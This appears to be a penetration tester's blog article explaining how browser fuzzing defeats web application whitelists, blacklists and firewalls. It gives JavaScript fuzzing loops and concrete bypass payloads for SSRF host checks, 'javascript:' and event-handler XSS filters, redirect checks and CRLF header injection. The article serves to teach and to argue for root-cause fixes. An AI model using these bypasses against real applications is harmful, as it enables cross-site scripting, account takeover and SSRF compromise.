Expert Intel

The importance of proper filtering within web applications

Published: February 2, 2024
Updated: February 05, 2024
Expert: Toby Davenport
Role: Penetration Tester
Specialises in: Offensive Security
What you will learn:
For those who have a technical understanding of offensive cyber security TTPs and want to know more about the importance of proper filtering within web applications, this intel is one for you.
Throughout the assessment of countless web applications, one thing has become apparent to me: web applications often rely too heavily on whitelists and blacklists, alongside weak regex filters, and this can be dangerous...

Special thanks to Gareth Heyes for his work “JavaScript for Hackers”, which provided much value.

During software security testing (penetration tests), whitelisting and blacklisting are encountered many times, with testers trying to bypass the regex (regular expression) filters in place. But what is the actual process of identifying the characters that can bypass these filters? How are new payloads formed? How are Web Application Firewalls bypassed? It is not a case of just throwing things and seeing what sticks: browser behaviour is fuzzed.

Throughout the assessment of countless web applications, one thing has become apparent: web applications often rely too heavily on whitelists and blacklists, alongside weak regex filters. This can be dangerous, and it can open the way for client-side attacks as well as server-side attacks such as Server-Side Request Forgery.

Client-side attacks can be devastating for users of an application. In severe cases, they can lead to full cookie and session retrieval, allowing a malicious user to take over accounts on the application. Where cookies and sessions are secured, client-side attacks can still be used to have a victim perform actions on an attacker’s behalf, such as changing the passwords and email addresses associated with an account, even if further protections such as cross-site request forgery tokens are in place (provided those tokens are referenced within the application DOM).

Server-side attacks are far more exciting for a malicious user: exploitation of Server-Side Request Forgery (SSRF for short) can lead to full compromise of cloud and internal environments.

What do whitelisting and blacklisting have to do with any of this, and what are fuzzing and fuzz testing?

Fuzzing (or fuzz testing) is the process of systematically probing how input is handled by an application or browser. Fuzzing browser behaviour can identify characters that cause the browser to behave in ways that undermine application filters. In short, fuzzing can be used to identify what input data can be inserted between the characters of a word to break up a word filter, without affecting how the string is rendered or interpreted.
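As a rough illustration, the pattern such fuzzing follows in a browser console usually looks something like the hypothetical sketch below (the helper name and the 0x100 range are illustrative, not taken from any specific assessment).

    // Hypothetical harness: try every character code in a chosen position and
    // record the ones the browser treats as if they were not there.
    function fuzzCharCodes(build, stillWorks, max = 0x100) {
      const hits = [];
      for (let i = 0; i < max; i++) {
        const candidate = build(String.fromCharCode(i));
        try {
          if (stillWorks(candidate)) {
            hits.push('0x' + i.toString(16)); // this character code did not change the behaviour
          }
        } catch (e) {
          // this character breaks the construct entirely, so it is not interesting
        }
      }
      return hits;
    }

The concrete examples later in this article are all instances of this pattern: build a candidate string with one character varied, then ask the browser whether it still behaves like the original.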

Web applications try to limit the input a user can enter in an attempt to stop malicious “payloads” from being used against the application. But what happens when this is not thoroughly implemented?

A live example of weak whitelisting was seen in the Django backend's handling of whitelisting, referenced under CVE-2023-40017.

Applications are made up of different elements: the front end, the backend, and the behaviour of the browser in which the application runs. Browser behaviour is a huge element of web exploitation, and it can be fuzzed to see how input is handled by both the application logic and the browser.

For instance, take an example web application that implements a proxy. This proxy allows the web application to make a request to a backend application to retrieve images, with the target supplied as a parameter to the endpoint.

The application performs a check to ensure “goodhost.host” is present in each request to the endpoint.

A request that does not satisfy this check fails and returns a 500 response, and straightforward attempts to reach a different host through the endpoint likewise return a 500 response. Browser behaviour, however, can be fuzzed and exploited to break the whitelist, tricking the front end into passing input through to the backend that it should have rejected.

What now?

We need to think about what browser behaviour will pass the check being made by the application. The check ensures that goodhost.host is present in the request and assumes that it is the host the browser will send the request to.

We want to find characters that cut the request short; in this case, a request combining %5c with a # does the trick.

When browser behaviour is fuzzed, we find that the browser decodes %5c to \ and requests only the first host, while the whitelist believes the requested host is goodhost.host. The # then cuts the rest of the host off in the browser's request.
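A quick, hypothetical demonstration of both behaviours using the browser's URL parser (the hosts below are placeholders; the original request from the assessment is not reproduced here).

    // WHATWG URL parsing, as implemented by Chrome: the string contains
    // "goodhost.host", but the host actually requested is evil.example.
    new URL('https://evil.example\\goodhost.host').hostname; // "evil.example" - "\" is treated as "/"
    new URL('https://evil.example#goodhost.host').hostname;  // "evil.example" - "#" starts the fragment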

In some browsers, \ is treated as /, bypassing this whitelisting. All of this can be identified through JavaScript fuzzing, to find which characters pass the whitelist while still sending the request to the evil host; a sketch of such a fuzz loop is below.
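A minimal sketch under the same assumptions: goodhost.host from the example above, evil.example as a hypothetical attacker host, and the URL API as the oracle for what the browser would request.

    // Which characters can separate the real target from the whitelisted string,
    // so the URL still contains "goodhost.host" but actually points at evil.example?
    for (let i = 0; i < 0x100; i++) {
      const sep = String.fromCharCode(i);
      try {
        const parsed = new URL('https://evil.example' + sep + 'goodhost.host');
        if (parsed.hostname === 'evil.example') {
          console.log('0x' + i.toString(16), JSON.stringify(sep)); // passes the substring whitelist
        }
      } catch (e) {
        // the URL parser rejects this character in this position
      }
    }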

Now consider a web application that fails to sanitise HTML input but strictly blacklists “any” malicious strings; for instance, javascript: will trigger a Web Application Firewall (WAF) and the request will be denied.

Fuzz testing can be used in different browsers to see which character codes can be placed before, after, or in the middle of a word to create a different string that the filter ignores but that still triggers the original payload, passing the WAF.

Fuzz tests in the Chrome browser identify multiple character codes that can be encoded to their hex equivalents and placed before or after a string while it still functions as the unmodified string.

Such fuzzing surfaces strings that are broken up by extra character codes yet still function as “javascript:”, passing a blacklist; a sketch of the approach is below.
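A minimal sketch, assuming the test is run in the Chrome DevTools console; using an anchor element's protocol property as the oracle is my choice here, not necessarily the original methodology.

    // Which character codes can sit inside "javascript:" and still leave the
    // browser treating the link as the javascript: scheme?
    const ignoredInScheme = [];
    for (let i = 0; i < 0x10000; i++) {
      const a = document.createElement('a');
      a.href = 'java' + String.fromCharCode(i) + 'script:alert(1)';
      if (a.protocol === 'javascript:') {
        ignoredInScheme.push('0x' + i.toString(16));
      }
    }
    console.log(ignoredInScheme); // typically tab, line feed and carriage return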

The character codes identified this way are specific to the Chrome browser; each one can be encoded in hex, HTML or Unicode form to break up a blacklisted word.

This can also be combined with multiple encodings, such as HTML5 entities, to bypass different blacklists. In many cases a WAF will search for “:” and block a payload; using an alternative encoding of the colon allows the payload to pass the filter, as sketched below.
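A hedged sketch, assuming the payload lands in an HTML context where entities are decoded (the element and the console check are illustrative).

    // The filter never sees a literal ":", but HTML parsing decodes the entity
    // before the URL is interpreted.
    const container = document.createElement('div');
    container.innerHTML = '<a href="javascript&colon;alert(1)">click</a>';
    console.log(container.firstChild.protocol); // "javascript:"

Numeric forms such as &#58; or &#x3a; behave the same way.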

The same applies to event handlers: fuzz testing reveals which characters can be placed before or after an event handler name while it still executes its function.

Here, a / is rendered immediately before the word, yet the browser still treats it as the real event handler, passing a blacklist filter for the handler name.

This would bypass the “onmouseover” blacklist.
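A hedged sketch of that behaviour; the div element, the quoted handler and the console.log body are placeholders of mine.

    // Immediately after a tag name, "/" drops the HTML parser into attribute
    // parsing, so "/onmouseover" carries the handler even though the literal
    // string " onmouseover" never appears in the markup.
    const wrapper = document.createElement('div');
    wrapper.innerHTML = '<div/onmouseover="console.log(1)">hover me</div>';
    console.log(wrapper.firstChild.getAttribute('onmouseover')); // console.log(1)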

Another example is the way an application handles redirects. Say a WAF is looking for a strict https schema, which can also be referenced as “//”. The application does not want external hosts referenced after // and is strictly looking for the literal “//”. However, we can fuzz across different browsers to find which characters can be inserted between the two slashes (think of the value as /$/, with “$” replaced) so that the payload still operates as the original “//” and requests the hostname. Multiple character codes can be encoded within /$/ and still function as //, bypassing the “//” blacklist; a sketch of how they can be enumerated follows.
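A minimal sketch under assumed names (https://goodhost.host as the application's own origin and evil.example as the attacker host), using the URL API to stand in for whatever the application ultimately does with the redirect value.

    // Which characters can replace "$" in "/$/evil.example/" and still make the
    // browser resolve the redirect to evil.example, just as "//" would?
    for (let i = 0; i < 0x100; i++) {
      const candidate = '/' + String.fromCharCode(i) + '/evil.example/';
      try {
        const resolved = new URL(candidate, 'https://goodhost.host');
        if (resolved.hostname === 'evil.example') {
          console.log('0x' + i.toString(16), JSON.stringify(String.fromCharCode(i)));
        }
      } catch (e) {
        // this character stops the value from resolving at all
      }
    }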

If the filter also needs the condition of a whitelisted host to be met, we can throw in a ? or # (or their URL-encoded representations) before the second domain.

Many times, whitelists do not check the placement of the dot (.). For example, a whitelist for whitelist.uk that validates the wording but has no strict regex or length validation could be bypassed by white.list.uk. Working backwards from the whitelisted string often yields good results. The same idea applies when the payload is placed within a Location header: carriage return line feeds can be used to break out of the header, create a new header and introduce cross-site scripting, for example %E5%98%8A%E5%98%8Dlocation:notwhite.list.com (these sequences decode to Unicode characters whose low bytes are 0x0A and 0x0D, so backends that truncate characters to a single byte emit the line feed and carriage return).
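As a hedged illustration of the kind of loose validation this refers to, the pattern and test URLs below are hypothetical rather than taken from a specific application.

    // An unescaped dot and missing anchors make this "whitelist" accept far more
    // than the developer intended.
    const allowed = /whitelist.uk/; // "." matches any character; no ^, $ or length check
    console.log(allowed.test('https://whitelist.uk/'));                   // true - intended
    console.log(allowed.test('https://whitelist-uk.evil.example/'));      // true - not intended
    console.log(allowed.test('https://evil.example/?next=whitelist.uk')); // true - working backwards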

Web Application Firewalls can also be bypassed by fuzzing how browsers handle whitespace-like input used to break up wording, with the browser translating the wording back to its original form when the payload runs. A range of values can be identified across browsers: character codes for characters that have no impact on the evaluation of the string.

Multiple fuzzed characters can be found that are ignored by the JavaScript engine but break up the blacklisted word “window.location”, bypassing the filter. The JavaScript is still evaluated and functions as intended, with the fuzzed characters breaking up the filtered string; a sketch of how such characters can be identified is below.
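A minimal sketch, assuming the test is run in a browser console and using eval purely as the oracle; the split point between “window” and “.location” is my choice.

    // Which character codes can be inserted into the expression without
    // changing what it evaluates to?
    const invisible = [];
    for (let i = 0; i < 0x10000; i++) {
      try {
        if (eval('window' + String.fromCharCode(i) + '.location') === window.location) {
          invisible.push('0x' + i.toString(16));
        }
      } catch (e) {
        // syntax or reference error: this character changes the expression
      }
    }
    console.log(invisible); // typically whitespace and line-terminator code points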

The same approach can be adapted to defeat whatever string the filter is looking for.

In conclusion, relying on whitelisting and blacklisting is not an effective measure of protection for web applications, and a Web Application Firewall should never be solely relied upon. Does this mean a WAF is not worthwhile? Not at all, but it means issues should be addressed at the root cause instead of putting protective measures in front of the weakness, especially for client-side issues, because browsers can exhibit different behaviours that can be exploited to bypass those protections. Issues such as cross-site scripting should never be overlooked, even if authentication sessions are protected from JavaScript. If a malicious user can control the source JavaScript, they can have users perform unauthorised actions, which, depending on the application, can still lead to account takeover, or to actions on one application interacting with another across the same origin and issuing malicious requests.


Take a proactive approach to protecting your digital assets: get in touch about our award-winning Security Operations Centre.
